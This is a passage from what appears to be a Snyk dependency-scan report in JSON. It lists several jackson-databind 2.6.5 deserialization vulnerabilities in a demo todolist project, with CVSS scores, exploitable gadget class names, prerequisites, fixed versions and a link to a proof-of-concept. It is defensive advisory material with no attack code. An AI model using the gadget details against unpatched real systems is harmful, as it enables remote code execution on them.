"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:50:19.998455Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.582959Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:57.137266Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:19.998455Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.582959Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `javax.swing.JEditorPane`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2642)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.81534", - "probability": "0.00775", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10969" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-758m-v56v-grj4" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-26T16:25:31.113677Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-26T14:55:31Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-26T14:55:31Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.582959Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561373", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0.0,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2662", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:51:25.268261Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:53:54.576513Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:38.826605Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:25.268261Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.576513Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `org.aoju.bus.proxy.provider.remoting.RmiProvider` (aka bus-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2662)\n", - "epssDetails": { - "percentile": "0.81534", - "probability": "0.00775", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-10968" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-rf6r-2c4q-2vwg" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-26T17:09:01.709397Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-26T14:55:20Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-26T14:55:20Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.576513Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561585", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2670", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-11113", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:50:18.889961Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:47.400473Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:21.749219Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:18.889961Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:47.400473Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.openjpa.ee.WASRegistryManagedRuntime` (aka openjpa).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2670)\n- [PoC](https://github.com/Al1ex/CVE-2020-11113)\n", - "epssDetails": { - "percentile": "0.81603", - "probability": "0.00786", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11113" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-9vvp-fxw6-jcxr" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-31T08:36:41.369827Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-31T06:16:36Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-31T06:16:36Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:47.400473Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561586", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2664", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:44:29.297635Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:14.145935Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:57.628835Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:44:29.297635Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:14.145935Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadgets `org.apache.activemq.*` (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2664)\n", - "epssDetails": { - "percentile": "0.81603", - "probability": "0.00786", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11111" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-v3xw-c963-f5hc" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-31T09:28:18.821103Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-31T06:16:37Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-31T06:16:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:14.145935Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561587", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676", - "title": "GItHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2666", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:44:29.301384Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:14.113524Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:03.656527Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:44:29.301384Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:14.113524Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.commons.proxy.provider.remoting.RmiProvider` (aka apache/commons-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization 